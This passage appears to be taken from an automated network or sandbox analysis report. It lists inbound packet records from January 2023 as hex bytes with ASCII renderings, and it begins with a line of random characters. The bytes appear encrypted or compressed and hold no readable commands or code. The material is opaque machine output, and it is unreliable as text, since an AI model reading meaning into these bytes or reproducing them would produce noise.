OxB_/pKL@J"4`?7c=aqq%DkXyK>\2EvyoYb?YgT,i(6E+js9#^R^3:hyk=xKlVl7Q6_c;%r*l-r Z7=g~sIt5?>7BsZQTxCf%G<$!
2023-01-05 12:18:10 UTC	123	IN	Data Raw: 16 53 29 30 9a 3f 96 17 7c 0c 7c 69 db e8 3c 2b 0a 3e b9 ff a5 6d f7 0c 6b 48 bc b2 5e cf 51 ea ee 6a 7e 10 95 c6 d8 ac 31 94 cd b2 f8 b1 b0 4a e3 40 d8 c6 ed d5 cf 07 78 4c 85 c8 43 06 b6 8d 0b ca 43 20 c1 fe 09 8d 4d 87 01 d6 e1 9f 0c 39 22 c9 f5 db 36 8d ce 8e 22 ad 03 b4 52 20 26 e5 d1 5f fc 04 b5 52 7a fe 6d 28 3b 5a ad 73 55 62 a6 71 37 8d 81 bd 70 43 96 41 40 39 00 e4 40 a1 b2 a7 0d 1d 1d b7 b0 83 0f d8 ea 82 1c 6d 5b 08 05 44 26 5e cf c2 47 39 ba b8 1c bd ed 66 25 27 3e 2e 27 c1 36 55 c9 49 8c cb 31 d9 ae 51 72 92 e2 72 a6 d9 c6 2a 39 29 b3 97 e8 ed 23 2b 76 9d 62 28 59 75 98 e5 2f 6a 7f 1d 63 78 7c 11 87 8e 42 12 49 8f 27 5f 14 d2 d6 1d 7e a1 49 32 41 cd 20 d6 a4 25 16 d2 cf 06 3f 4d c2 76 97 e8 49 4e 0a 1d 3b 52 10 de 41 b5 7e e4 12 a9 24 d1 ba Data Ascii: S)0?\|\|i<+>mkH^Qj~1J@xLCC M9"6"R &_Rzm(;ZsUbq7pCA@9@m[D&^G9f%'>.'6UI1Qrr*9)#+vb(Yu/jcx\|BI'_~I2A %?MvIN;RA~$
2023-01-05 12:18:10 UTC	139	IN	Data Raw: fb ba 55 c1 28 f7 50 ae fd 06 b4 e0 06 19 3a b9 d1 dd 1d 89 8b a0 44 2c fe 7b cc 22 ec 62 fc 32 6b 01 2d 63 f1 6d d1 d4 c6 18 44 1c d7 bf 77 be 6d 80 38 9d f4 cd df a3 ee 0e a7 0a d1 c7 5a bc 60 14 4c d7 42 9c ae d6 99 7c ba 06 91 02 f8 ea 87 af b0 d9 e6 0b 79 7b 44 70 b6 83 9f ff 92 7f 5e b1 d9 74 2b 0b 79 c1 f4 ce 26 fa 97 68 06 0b 0e 98 17 f9 8d f2 26 53 c1 74 d9 ef 68 ff 07 13 d0 d2 04 ad ea 99 fe aa 0d f0 b1 91 af a5 95 58 fb c9 e9 3c 0f cc 6d 18 49 83 e9 f4 cb f5 82 cd e7 ca d2 b3 c8 7b 59 3a 66 92 a2 81 ce f6 fa bf 19 4d ca ff 33 80 26 03 3b 96 31 7d 10 d4 38 a6 1c f7 63 4a 2a 40 9c f5 db 99 83 5a 15 07 3b 00 72 b0 03 a0 2a 4c af e0 7a 8f 1d b8 b4 06 11 9d fc 77 4c fc bb bf f3 4f 7c 61 71 09 76 ff 51 ec 7e e6 cc 41 88 5e c0 90 1c be d8 08 a3 f6 5e Data Ascii: U(P:D,{"b2k-cmDwm8Z`LB\|y{Dp^t+y&h&SthX<mI{Y:fM3&;1}8cJ@Z;rLzwLO\|aqvQ~A^^
2023-01-05 12:18:10 UTC	140	IN	Data Raw: 60 1a 5d bd 0e cd ae 71 94 1f db 60 94 68 53 d3 a2 d8 5b 90 bf c5 a2 10 6a 6f 2b a0 a5 6a 04 db 68 a2 f9 a3 92 7b 80 ae 79 0d 76 02 22 cb d1 86 4b e9 20 7f ed 98 5b c5 37 b1 bf c4 4d ac 8e ea f9 63 a8 cf bf 83 e5 94 ce 0d 84 fc e8 73 6c 4f f5 12 ae 30 5e 89 aa b5 51 74 59 55 87 dc 5f e0 99 1a 39 28 ef c9 d7 87 04 52 ad 32 75 07 d3 52 f2 48 a6 aa 7d 96 6a 9f c6 e6 20 01 e6 40 b5 63 76 9f cc e5 b4 b2 8f 47 9f bb 21 9a 59 36 18 2a 1b 10 d5 48 a7 bb 7d 14 4b 70 77 a4 0d e8 f4 1c e2 73 d3 31 e8 ed a5 48 4e bf 47 41 5c 01 7d 2b ce 6f 2a e5 0b 9a 4a 29 96 24 66 aa 62 31 a1 29 35 e9 2c a0 ef ff 1c 87 35 e7 d5 0a 9e 45 67 86 2d 79 aa a0 13 04 db b5 9a a9 49 c2 f4 ea 16 4e ec 13 d0 ee 60 7a f5 49 7e 17 ef e5 71 81 5e 63 94 b1 82 51 c6 4e 87 3b 48 19 dd 8c 32 f6 44 Data Ascii: `]q`hS[jo+jh{yv"K [7McslO0^QtYU_9(R2uRH}j @cvG!Y6H}Kpws1HNGA\}+oJ)$fb1)5,5Eg-yIN`zI~q^cQN;H2D
2023-01-05 12:18:10 UTC	156	IN	Data Raw: c7 12 60 20 13 80 8d 67 7e 0a a3 c9 31 92 5c 9f 7f 38 79 2a 90 54 9f ff ac 38 54 98 08 e6 2f b3 e8 52 bb 60 e1 95 2e 81 f1 9d 89 b1 67 e3 82 5b a6 37 1f df 30 17 93 e4 ac 8a 91 2a 7b d9 9a b8 45 f4 28 93 1d bd 86 d2 a9 ca 64 f4 11 df 70 0d 36 ab cc 77 a8 a3 4b 47 8a dd e6 a6 0d 31 0e 0f 46 80 8e a2 df 61 5e fa 43 9f 4f a3 b2 71 19 60 09 2c aa 75 c9 c7 61 e1 96 3e a4 3c 0c eb 7b dd 03 ae 6c 5f ea 5e 96 36 11 bb b3 88 5f c1 2a 4d c7 15 cf ee f8 b2 b7 a7 e0 92 67 0f b0 ed 6b 71 cd b3 3b f3 c5 0d 63 d1 11 aa cb a6 57 1e d1 69 8f ec 11 e4 88 a3 d7 27 67 ba 9d 27 e4 cc fa 10 40 04 c7 7f 18 1b cc 66 48 67 4f 83 6d 85 2b 21 c6 51 6f c0 6e 9d df 90 02 38 ad ac 12 fd 50 98 e2 f0 18 44 b7 32 c1 dc 5b 3a 2e 52 34 fb 36 18 b8 0d 67 8c f2 b0 ce dc 00 8d ed 73 2d 30 00 Data Ascii: ` g~1\8yT8T/R`.g[70{E(dp6wKG1Fa^COq`,ua><{l_^6_*Mgkq;cWi'g'@fHgOm+!Qon8PD2[:.R46gs-0
2023-01-05 12:18:10 UTC	157	IN	Data Raw: f7 c0 14 33 b1 66 63 6a 35 1b 61 74 f0 4e 3a 9d 67 60 84 eb 70 50 06 29 f7 e9 c8 11 97 71 b2 b3 86 f5 bf 46 de fc 47 e6 48 bf 4d 59 2d e1 c2 9f 6f d6 b6 5e b9 12 0d c7 80 fa 88 9d ca 50 f3 71 f9 29 5c 4b 91 66 b3 67 4d 69 e5 45 8c ce 2f 00 a9 99 ab 33 9f 77 ac 00 52 f0 b8 d3 6d b0 3f aa 58 da 22 b3 f5 a4 de 57 a8 8c 52 80 b3 39 46 f2 da d4 95 52 3e bd 19 6f ca 78 94 fb 13 2a 4f c0 06 a1 ca 99 ed 4a 24 db 20 5a b5 0d e2 58 be 9a d7 0a 70 5f 87 0c fd 0c 23 1a e8 be 65 76 5c 5b f6 a4 41 90 2b f0 8a 80 32 a8 80 be 7e 09 16 c5 92 d4 6a ff f5 07 58 0f 6a da ca 6b 49 07 ce e8 d5 e4 90 72 95 2b 8b f1 28 6d ab 0d e4 00 39 ce 1d d8 1d f0 b6 a1 11 7d 86 84 2c cb c2 ef f9 27 3a 41 ec 52 46 e1 44 0f 53 46 89 dd e6 0b 6b e2 80 ad 8e 49 bd 08 0d 03 e4 07 f0 3e e4 f6 b0 Data Ascii: 3fcj5atN:g`pP)qFGHMY-o^Pq)\KfgMiE/3wRm?X"WR9FR>ox*OJ$ ZXp_#ev\[A+2~jXjkIr+(m9},':ARFDSFkI>
2023-01-05 12:18:10 UTC	173	IN	Data Raw: ad c5 52 85 2d e4 18 2d 45 c1 9a 43 f0 b0 06 41 9a 01 6a d3 9e cd 79 88 dd 46 02 7a f6 62 b7 18 d0 ac 5c 69 4d af 7b 2a 74 b1 f4 db 3f 97 e9 af b4 7f 6e b5 86 ee 9f d3 1e 0d d9 3f 13 e9 0f db 42 f6 4f be 73 2e 5e f4 4f ed 9c 89 74 66 5b c8 ce c9 f7 cc 84 45 df 75 cf 0c c4 1f d3 d0 1b 6d f2 7b bb d8 d5 a7 7c 5a 09 bd e1 41 dc 74 01 d4 e8 83 1f 07 c2 f0 43 33 c9 8a 86 6d 63 dd 63 28 90 ba 0a 5b d4 15 3d b9 f4 b1 58 de ed 73 b9 c5 52 51 f1 10 60 db 96 2e 13 43 8c cb de fb 9a 73 3f 59 da 94 3f 21 25 d7 91 73 a1 98 02 fb f1 4a 1d 52 bb b5 88 28 c7 e6 15 47 16 2d 44 f6 6f 2e b2 07 59 fd 30 e5 09 d5 d9 1b b1 93 61 8a 1e 31 65 9a 62 df d2 c1 2e 71 e4 43 c9 c5 58 f2 ea 1f e0 aa a1 36 ec ed 31 5b b1 be e8 11 7c 2a 62 7d 0c 3b 9e ec 14 d1 44 e2 3b e0 c7 bd 65 97 b1 Data Ascii: R--ECAjyFzb\iM{t?n?BOs.^Otf[Eum{\|ZAtC3mcc([=XsRQ`.Cs?Y?!%sJR(G-Do.Y0a1eb.qCX61[\|b};D;e
2023-01-05 12:18:10 UTC	174	IN	Data Raw: fe ad 7d db 17 43 da ff b6 fb ca ed ef e5 fc ee 17 9f 6b 75 a8 ab 24 9a ae b5 df c9 da bf 70 51 55 af 4c 12 fb 40 16 5a bf b3 d5 88 4c 0c 2c 99 e8 50 dd da 39 f5 90 b3 23 4a 0b 19 81 a2 5e 02 5e 7f 69 e4 2c 22 3a 02 aa 63 61 67 e3 41 68 4c bd e8 bb 4b 1e 93 26 a0 72 90 fe e5 b9 6e 1e 93 3b 41 c9 6b 71 d6 1a 81 49 a0 3f 99 7f 49 e5 75 28 8e 66 65 7e 9b de ca 22 8f 61 5d 85 ad 4a 1c 81 87 13 da 7c 11 90 3a 0d c4 78 38 f4 38 dd 60 ae db f0 75 e9 47 ca 4c 09 e9 b0 6b 3d 70 a5 2d a4 90 c2 38 7c f2 99 9f d1 5a 61 f0 a4 f1 be a6 71 bd 74 1a 77 fe cd 95 d5 69 5a 74 15 ca e3 c0 43 ff ac 46 1e 41 5c ae c0 eb f5 a8 1b 8d f1 66 b3 93 75 e3 e5 f1 07 78 4b c0 c5 5b c8 7e f5 2e ea c3 62 e7 70 fe cf 40 aa 6c e3 18 e4 9b d6 18 e9 46 0e 52 01 5d cd 13 5a c0 5d ed fe 09 8b Data Ascii: }Cku$pQUL@ZL,P9#J^^i,":cagAhLK&rn;AkqI?Iu(fe~"a]J\|:x88`uGLk=p-8\|ZaqtwiZtCFA\fuxK[~.bp@lFR]Z]
2023-01-05 12:18:10 UTC	190	IN	Data Raw: 1b 81 17 72 05 fa 21 57 e2 95 15 92 fb 6c 44 dc 42 53 bc 6b ca db c0 ea 42 21 3d ec 9a 53 d1 e6 77 55 fe 6b 8c 0d ca 34 e9 ca eb 18 cb fb 19 63 79 05 25 5b c2 a0 ca 1a f3 33 cb a4 cb cf 55 e7 9b f4 e6 d3 00 60 ca 1a 83 ef a7 5a 7f d1 88 b7 7b 15 61 27 64 17 d0 18 6b 3d 32 a4 5e a8 50 ba 62 cd c6 3e 35 27 98 bb 65 e7 3d 00 af fb 11 93 14 a1 a9 87 07 a3 22 80 b9 a1 30 f8 fb 87 d9 90 bf 26 c7 d1 9c 34 ea 86 1e 95 79 8b 30 2a 30 94 8d d5 de 88 b2 33 d7 1e a2 ed 0d f0 48 12 f7 be 11 e9 38 60 ee 46 97 25 b5 08 87 b9 66 e5 48 df ce 3e f6 e1 35 d2 e4 f9 26 dd aa df 2a 11 d0 83 73 88 55 36 72 84 be 0b 03 4e ce fb ce 6c 85 f1 cc 84 c1 cc b6 0f e1 bc 3b fc f4 9a 60 05 8f 43 7b ab 3e 7c fb 96 a8 2b f0 ed 30 cf 76 3d 54 3f ab 80 26 8d 0e e3 d9 67 c1 74 a0 71 5a 80 5f Data Ascii: r!WlDBSkB!=SwUk4cy%[3U`Z{a'dk=2^Pb>5'e="0&4y003H8`F%fH>5&sU6rNl;`C{>\|+0v=T?&gtqZ_
2023-01-05 12:18:10 UTC	191	IN	Data Raw: 51 e7 27 91 e3 f2 fe 88 b7 14 4f 90 92 66 52 b8 8d 9d a2 bc c3 4e 51 94 92 ed 2e e3 24 d2 a8 1d a4 e4 9d bc d2 61 99 47 62 ae 9b cb 6b f9 78 b4 92 c2 c3 a8 1f 7e 46 f3 5e 3a 1d 8f 4b 4a da 04 b9 02 b7 5a 36 96 dc 4a d0 a1 43 01 62 a3 8c 51 b8 5b 71 de d2 f4 4a de be e4 a7 36 0c 85 6a 44 b9 5e c9 6b 22 11 8a a5 85 88 ca bd d0 b7 36 97 51 c0 eb 8e 37 f4 a2 db d5 e3 e5 9f 88 d5 ea d7 b1 35 64 ae fe 62 ad 08 63 e1 b8 0b 28 cd 1d 81 b9 0a 1d 29 ef 61 66 a6 82 86 ba 31 f0 5c ae 27 78 7f 10 ca 78 3f e4 f6 2b 38 e1 55 af 77 a9 be 6a a4 df 95 aa e2 f8 40 ae 18 d2 eb 07 5c ea 1d 00 f0 ba 21 2c 98 38 42 9d b3 2f b9 9c 41 1d 03 50 e7 34 11 3c 03 22 31 ca 1c 3f d4 f5 7e a8 f7 04 a0 2e e0 67 ed 5b 2f b1 88 9d 95 3f 83 6f af f3 92 aa f6 f5 07 1b 14 96 70 5b 5b 77 65 dd Data Ascii: Q'OfRNQ.$aGbkx~F^:KJZ6JCbQ[qJ6jD^k"6Q75dbc()af1\'xx?+8Uwj@\!,8B/AP4<"1?~.g[/?op[[we
2023-01-05 12:18:10 UTC	207	IN	Data Raw: ea b1 91 dc 76 e5 8f 85 23 ea 55 75 2e fe 66 75 fe a3 ef ea 3a 25 91 57 fe 63 0b d4 79 13 0e ad e1 b4 78 43 d9 56 a5 f1 82 46 1c dd ca 8d e3 aa fe 48 da ce 11 f1 18 60 15 10 d5 fa 14 ea dc 47 f3 81 d9 bb e4 ea 63 a4 ba 5b 2e e8 96 ed bd e4 a4 5c dc 93 bf ae f4 91 47 56 33 45 0e 65 ce 3c 64 13 7a a5 0d e8 bd d0 70 da 79 ab 6d d4 f9 2f 12 0c 23 b6 78 44 05 ea 7e 1d 50 f6 44 32 10 e2 8a 78 9c 9c f5 e6 92 4a 93 d6 a8 ab d9 2c e7 f6 16 2a 9f ae 1c 81 45 05 f5 3b 64 fb 31 87 d2 9b 03 bd 12 8f 05 53 4a 2d d7 3a 0c bd 8b 82 5a e2 95 66 16 03 d4 b5 2b 6f 6f 1a d1 13 8b 39 7d 68 e1 e8 3f e2 9d 40 0f ef 8c d7 09 b1 0e cd 0b 9f 7e 23 68 fe 4a a1 d0 fc 50 87 26 ad 05 b6 bb 19 05 53 4c d0 0b df ac ca 1c 65 8a 09 aa e6 95 69 9b b1 4e 3a 41 6d 74 82 e6 fe dd 3f 41 3b c7 Data Ascii: v#Uu.fu:%WcyxCVFH`Gc[.\GV3Ee<dzpym/#xD~PD2xJ,*E;d1SJ-:Zf+oo9}h?@~#hJP&SLeiN:Amt?A;
2023-01-05 12:18:10 UTC	208	IN	Data Raw: 69 42 79 ec 1f 2c a3 fc f8 8e 90 78 b7 5a ba 43 3b 9d a1 a0 73 0c 9e a3 d8 7d ca d8 1d 01 14 65 93 18 e6 aa 9d a0 fb dc 37 c2 9d 97 3e 99 72 27 28 5d eb a7 da 56 b5 a1 cd 79 03 08 2e 72 81 e2 58 a7 fc e9 26 44 06 05 5a 0e 93 2a 31 e1 e1 12 dc d4 a9 8f cd 5f fb b4 6d ca e4 f7 07 bc 0a 9f b3 bf 59 9f d8 4f a6 c0 e7 a6 a2 11 b5 76 e9 22 7c c9 69 28 6e 2e bb ad f4 36 24 e9 77 36 51 e7 b3 86 c6 1a 6f 4b 38 3e 65 a1 aa ad b3 b2 40 be fe 87 1a ea 96 36 c1 3f d6 6e 92 72 cd a1 11 36 f0 64 96 da 9e 4e 06 e3 4b 3d df a8 cb 6b ce 4d 09 c6 3f e7 4e b1 aa 57 7c b3 2a 47 7b a6 80 c2 07 85 93 d8 9d 8e bf f9 97 f5 c2 2f fd ec 8e 3f bb 34 72 20 78 b6 3b 8c 66 07 5b d3 46 54 9a 50 fd 64 91 43 59 cb 8f 23 73 2e 68 f1 21 38 e5 7d ad 16 d4 fe c2 cc 26 4b 1b cc a5 6b 51 72 44 Data Ascii: iBy,xZC;s}e7>r'(]Vy.rX&DZ1_mYOv"\|i(n.6$w6QoK8>e@6?nr6dNK=kM?NW\|G{/?4r x;f[FTPdCY#s.h!8}&KkQrD
2023-01-05 12:18:10 UTC	224	IN	Data Raw: 7d e8 45 5d 7a 04 4d 6e 7c f8 91 64 98 60 81 73 e9 72 60 42 a7 80 07 8d 77 6d 85 9d d7 36 ae 9d 73 61 20 9c d3 ba 3d af 8d bb d9 79 9d 6c be d9 d5 c4 b9 9a 39 db 88 f8 79 1f 9a 48 c3 1d 4c 4f f7 6f 1a 3b 10 a6 ae 34 cb 69 46 5b 9a c9 b9 50 e2 6e be d6 18 1c 1a 84 3c dc cd 58 b3 77 0b 7b c6 d5 02 8d a2 7a e1 46 6f 96 8e af 11 24 73 4c 53 af d0 87 30 2d 99 63 53 56 f8 5f 0e 45 dd a6 81 fc 20 8d 4d c0 b9 5a c6 40 16 3f 21 de 86 70 74 70 41 53 90 90 f9 d4 d5 48 64 90 9c b2 9d 71 1e 27 9d f2 8e 31 29 6b ea 16 3a 1d ca 2f f4 16 5a 43 f0 57 4a b3 24 db a9 7c 13 88 df e0 98 10 2b 40 5a 7a 3f 8d 52 e0 fc 0e dd 7d 6f 71 79 b8 a0 bc 5a a8 f4 bd cb 6a 01 48 9d 73 25 4c 8d 0f 5b 71 9f f5 b4 d7 2c db f9 fd d9 15 e8 f6 fd 6d ca 15 7b 0d ef b0 7a fc e3 1f 21 09 9a 2a dc Data Ascii: }E]zMn\|d`sr`Bwm6sa =yl9yHLOo;4iF[Pn<Xw{zFo$sLS0-cSV_E MZ@?!ptpASHdq'1)k:/ZCWJ$\|+@Zz?R}oqyZjHs%L[q,m{z!*
2023-01-05 12:18:10 UTC	225	IN	Data Raw: a8 49 c7 17 f2 e2 51 0c e3 b8 69 94 b3 75 92 76 6d 35 df ea c8 53 ef 52 ee a9 d1 13 ec e8 14 c3 54 f9 a1 77 42 7e 66 5b 67 f9 5b 52 b1 cf fb 36 88 aa e1 2f 86 c3 8d 66 e7 12 a9 82 b3 5d 44 b2 d0 04 af 98 1d 6a 52 1e 39 41 0d 24 c8 48 90 36 5c 9c 44 1b 1a b5 c8 33 13 a8 43 50 1e 15 f6 14 c4 4e 8e d9 37 d5 4e 2e 15 83 5c 62 aa b8 ae 48 f9 cd 83 78 d8 67 c2 17 a7 8a 38 26 ec 09 db 95 69 c4 d0 32 34 8f c0 ae 42 bf 22 a6 25 33 de 1f c5 cf ac f3 1b 18 d0 97 7a 3b f9 d4 6c 4e 84 9d f0 d6 c5 34 59 85 94 79 cd 80 63 96 b2 09 01 c7 6a fc d6 9d 7a 1c 8d c4 a0 be b2 8c 55 8f 07 f9 f4 00 bf 96 cb 4b 51 12 aa 3a 62 81 1d bb 4e 2a 37 4b 3b cd bb 59 db 78 f9 f4 ed 31 d6 46 6f a4 f5 a8 ad 43 78 be 11 79 08 9e 01 81 38 39 8d f7 7e 31 81 9e c6 06 4d cc f0 c4 f8 3c 26 dd 50 Data Ascii: IQiuvm5SRTwB~f[g[R6/f]DjR9A$H6\D3CPN7N.\bHxg8&i24B"%3z;lN4YycjzUKQ:bN*7K;Yx1FoCxy89~1M<&P
2023-01-05 12:18:10 UTC	241	IN	Data Raw: a7 b6 4a df bd f5 41 d3 ad 8c e4 84 0f c1 b5 bb 07 ae 4d fa b5 06 05 03 e3 87 82 ce ab 22 49 a3 bc 5a 29 36 a4 ce da 0d 28 e7 50 67 5d 86 47 14 42 65 c0 7b e7 ad 62 ee 47 4d 14 e3 c8 a3 1b 6c d2 5f 80 a0 5e d6 b6 52 92 eb 4b 6a f4 b0 be bf a3 17 10 ef 49 e3 12 bf 8f d8 3a e6 61 17 c0 0f 57 ee 98 2a b9 a5 dc cb 7e 19 ad ed 1b d6 89 2f ca 69 9c 43 ab 59 39 1c 0d ef 4e a8 26 b0 7f 6b f5 8d 38 82 f5 15 5e 55 a1 34 40 34 63 81 5f bd 3b ac a2 a4 ea 89 08 f4 ae 25 a4 da cd 6d 53 c4 87 45 c5 c9 80 62 c7 04 0f 76 9e d5 d4 4b 8f 5d 52 d5 50 f5 12 86 9f 2a 30 16 6b eb 45 15 4d fe 6b a3 76 6d c6 6b d1 44 6f 99 18 87 ce bd 60 fe e5 85 f7 5b 8c 40 c9 c9 02 49 f1 f7 1a 76 18 8f 7d 0c 37 9c 40 ff 9b ff 9b 57 c8 03 be a9 de 0a 19 d9 16 58 ce d2 df 8b f3 9a 3f ce c3 8c 6f Data Ascii: JAM"IZ)6(Pg]GBe{bGMl_^RKjI:aW~/iCY9N&k8^U4@4c_;%mSEbvK]RP0kEMkvmkDo`[@Iv}7@WX?o
2023-01-05 12:18:10 UTC	242	IN	Data Raw: b3 82 32 00 6b fe 31 7f eb 0e 73 c1 12 ae 75 c7 af ee 5a cc b5 96 b9 df 2a ee b8 95 7b 1d ff 71 9c 5d 33 b9 82 5d 3f 94 44 f6 46 54 1d a9 0d 2c 8d d5 41 a0 6e 2c 42 50 cc 85 c5 5c df a0 18 23 13 6e 54 95 81 c5 6e 7d 1d cd 73 50 34 f0 9e e6 be 04 9b 70 19 b1 48 41 b3 bb 14 fa 7e 55 06 d9 43 d6 a7 45 2d 0e 84 d8 97 60 11 e2 5e 47 eb 1d 3d 6b d1 fa ea 05 3d cc 63 a8 45 ab 5f ae ec 95 eb 06 35 0d a5 9a 29 1a 11 fc 3c 96 da 30 8e b6 d4 33 2c 72 39 0c 92 fa 4d d9 6c a1 60 ad b4 de 66 12 57 6d 5a 9f ca d6 09 c6 c1 03 5b 29 48 84 07 5c 2b 10 cb 49 71 ba b7 53 58 ca dc 43 84 6b 70 58 2e 53 57 a5 d1 95 e7 54 55 67 3c e5 06 a6 c6 f7 d0 0b 5c 84 4d 95 13 7d 06 9b 30 99 e4 a5 61 a8 0a 18 3e 86 52 74 58 89 0e 9f 8b 19 f5 9d 91 ff 05 5f 3e ce 56 d7 e9 ce 62 5c 4d c1 20 Data Ascii: 2k1suZ*{q]3]?DFT,An,BP\#nTn}sP4pHA~UCE-`^G=k=cE_5)<03,r9Ml`fWmZ[)H\+IqSXCkpX.SWTUg<\M}0a>RtX_>Vb\M
2023-01-05 12:18:10 UTC	258	IN	Data Raw: 36 a2 c2 00 65 15 c6 56 07 8c e6 ed c1 d2 9d c1 38 c3 37 02 b2 41 03 32 db 1f 74 aa d1 81 1a 1d a2 ca 3d 28 7a 7e 0b e4 fc fd 37 e1 dd 07 d4 18 de 5d 33 79 d4 a1 57 86 0c ed 8f 45 cb 35 1a 5e 27 d0 55 c3 fb 32 53 2d 6c ea 2b 2f 31 05 a9 c1 62 c2 6f b3 be d0 4d cf e0 17 e8 33 de a8 49 8d e7 77 a0 36 c6 bf e9 67 0b 2b 60 a2 df aa 06 8e c7 81 5d e2 63 7a 94 0f ad 01 5e f2 62 09 ef 09 5d 5d 5a 87 6f 8f a3 86 65 3f 6a ef 93 9f ba 73 10 07 a9 fc 0a 53 ab ce c9 8f 77 33 9e 7a 81 71 ee 95 f1 1c c7 34 dd 78 7d 32 7f 98 11 fa 2d d4 70 ed 2a 69 7c f3 2e 28 dc 7f 12 49 c3 1e 87 95 18 f2 ca 31 ad 93 6f 25 de 3b 07 87 55 19 cc 45 58 9d 0b b4 aa 95 59 31 3d 86 09 51 ca dc 35 18 a5 cc ae 93 7a b7 63 06 f2 a6 26 b9 85 55 f6 4e e8 a5 cb 48 9b bd cf d0 e8 1b 86 3c be 2f 9f Data Ascii: 6eV87A2t=(z~7]3yWE5^'U2S-l+/1boM3Iw6g+`]cz^b]]Zoe?jsSw3zq4x}2-p*i\|.(I1o%;UEXY1=Q5zc&UNH</
2023-01-05 12:18:10 UTC	259	IN	Data Raw: d6 04 ce 47 d6 04 1e 3d 77 91 4a bf e5 5c 74 70 57 ff 9d 75 fa 9f 0d b1 bd d9 b8 5f df 31 66 03 36 8b 0d 4b 6d f0 f2 5e 67 54 88 10 36 cc d1 29 80 79 ba 9a 1f 47 71 0b b8 6a 63 dc 8b d1 37 47 e3 a2 11 d5 77 1f 8b 95 2d 31 28 04 71 d7 ee 22 e9 f4 e8 b9 88 74 8a 81 f0 cb 63 9a 68 dd 1f 9c 1b 2b 5a f5 bc ca 1a 29 6c d0 ec 13 94 e7 4f 33 bf 0c 7b 1f 48 7d c6 97 ed 72 a3 36 42 18 d6 4c f6 9f 73 9c 06 cb 1f ba fd fb 6a 0c 77 ae 49 97 df f8 ca 11 bb 6c 58 a5 62 83 6b b4 86 f6 1f fd 6a 65 7f cc 47 fa de dc 98 5e ac e0 84 26 99 cc f6 3e 25 83 34 6a c4 f9 92 e6 bf 46 0d 9c 8c 33 85 60 dc 99 ed fb 31 1f 43 e5 cb f9 4a d5 c0 47 71 a6 2e d2 92 d5 e6 38 73 c9 fe 69 5d 9a 70 e6 1f de cc 6e 56 20 67 3c 19 d2 a7 53 03 5f c4 ad c0 1d 00 2c 9d b5 57 7e 13 a9 91 a7 f1 a3 7d Data Ascii: G=wJ\tpWu_1f6Km^gT6)yGqjc7Gw-1(q"tch+Z)lO3{H}r6BLsjwIlXbkjeG^&>%4jF3`1CJGq.8si]pnV g<S_,W~}
2023-01-05 12:18:10 UTC	275	IN	Data Raw: 96 e5 80 c6 76 79 80 b6 01 bb df 67 2d c1 83 8f 86 92 c1 15 60 a3 60 69 2d 2e 8e 29 50 83 11 80 07 c1 24 72 b4 ac fe 2f b6 12 a0 09 2d dc 29 1c 74 c5 4a ad f5 12 ea 93 ab f5 c6 78 92 70 29 ac 58 98 5b 43 4a 06 97 d7 38 3a 84 b5 9e 94 e5 08 2d f2 bd 69 49 c2 b5 fa 4b 4d 20 68 81 d7 2c fd 75 05 3c cf 50 16 ad ac c9 a9 1c 14 93 50 c1 8e ab 91 2f 53 b2 59 47 0c 61 47 fc ec 29 d6 11 98 41 c8 f4 a4 28 93 89 f5 a9 51 3a 21 d1 33 05 ab 04 ec b3 44 ab 2e 2f a2 41 79 dc 15 74 ca 0f f4 d3 df e9 64 22 d9 e5 db 8c 4e ed 8e 2e 50 f2 eb 2c 39 39 42 8a 14 b0 3a 3a c4 7f 68 8b c6 d0 1f 7d e4 41 0b d8 00 a7 24 35 4e 4c 94 be 85 5e 20 79 ca c7 b8 d7 8f db ac ca 11 f4 3f 67 3e 4f 72 a1 59 7a d0 6c e1 bd af 63 17 b4 64 fa 0a ee 57 12 a4 bb 2d f0 6c 75 74 89 ff d8 01 2a 8e bf Data Ascii: vyg-``i-.)P$r/-)tJxp)X[CJ8:-iIKM h,u<PP/SYGaG)A(Q:!3D./Aytd"N.P,99B::h}A$5NL^ y?g>OrYzlcdW-lut*
2023-01-05 12:18:10 UTC	276	IN	Data Raw: a1 77 a4 5c 32 d8 9c 50 44 ca 07 f9 6d 7e 7e 9b d5 d2 6c 5a c0 9e cc 36 b2 2f ab 4b 73 a4 41 5f 8c 2f 0c e2 a1 8b 99 8e b4 54 ad 8c 38 3a 55 06 93 87 f7 68 7f 1c 79 84 c9 96 ad db 68 c3 cd 28 df cc b6 6a ff 7a 22 8a e5 1f 41 7a 1e f9 42 a9 64 4b 34 94 ae be 4f 55 31 4c fc a0 ab b4 94 ec ac 70 bb 8e 54 0e d2 d3 df 62 03 0d e7 3b fa 96 46 40 bc 40 26 0e 83 00 25 d3 f5 0c 18 6e 17 37 80 ba 71 c4 39 78 a4 32 8c 4b 2d 54 5f 6a 39 e2 0c c7 04 a1 4f 1f 05 9d 9b 86 d1 c9 d0 d0 a9 60 e8 9c a0 1f 7b 34 74 7a 23 e8 fc bd b2 97 de 1d 41 87 ba e8 1f bf 84 4e f0 e3 61 74 42 dc df 9d bd 88 cb 09 1d 97 28 22 a3 c7 9a 4d d5 63 cd 5e 4e 9f fd 38 8a 92 6f 93 e6 2c c6 62 3a 59 65 16 66 f6 ba 11 61 66 7f c7 c5 86 99 bd f1 77 2c 10 a2 16 66 36 0e 06 a2 1c 89 30 fb 59 df 90 fa Data Ascii: w\2PDm~~lZ6/KsA_/T8:Uhyh(jz"AzBdK4OU1LpTb;F@@&%n7q9x2K-T_j9O`{4tz#ANatB("Mc^N8o,b:Yefafw,f60Y
2023-01-05 12:18:10 UTC	292	IN	Data Raw: c2 70 fa f9 5d c6 35 a3 36 cc b4 58 b4 34 21 5c ea 79 83 e0 61 c1 0d 06 de 2e de a0 f2 56 f5 5a 75 42 3d ee 2f 2e 81 75 db 52 3b 82 05 08 dd 95 cc b2 85 87 fc af 4e e8 6c 51 6d aa 4a 3c 18 d7 8c f9 7a c8 1f f4 14 97 02 6f 26 1f bc 20 6b 86 66 05 b4 cc ca b9 df 98 8e c2 4e 68 97 5b 9d 90 0d 90 54 56 34 66 ea e6 62 ec 1e 52 ae 97 9f 16 73 47 14 5b e0 cc d1 13 ea bc 39 b7 02 56 8f ca b6 88 4b c7 aa b4 df 2e 37 54 d9 f1 07 43 be a9 24 37 8e 0a 67 ee 47 b3 0c 1c de 76 47 5a aa c4 ab 13 c2 af 51 90 74 1a 5a 35 07 73 66 e2 0f 86 7c d3 88 31 26 fb b8 51 d9 69 b6 ca 0a 75 d6 f0 6b 37 e9 d9 17 60 ce b9 f8 83 21 5f 06 69 b4 fc db ec 86 d7 23 d9 dd 98 b3 00 7f 30 e4 9b 4e c4 98 ec 13 54 74 41 17 d3 37 95 b8 0b c6 12 2c 91 12 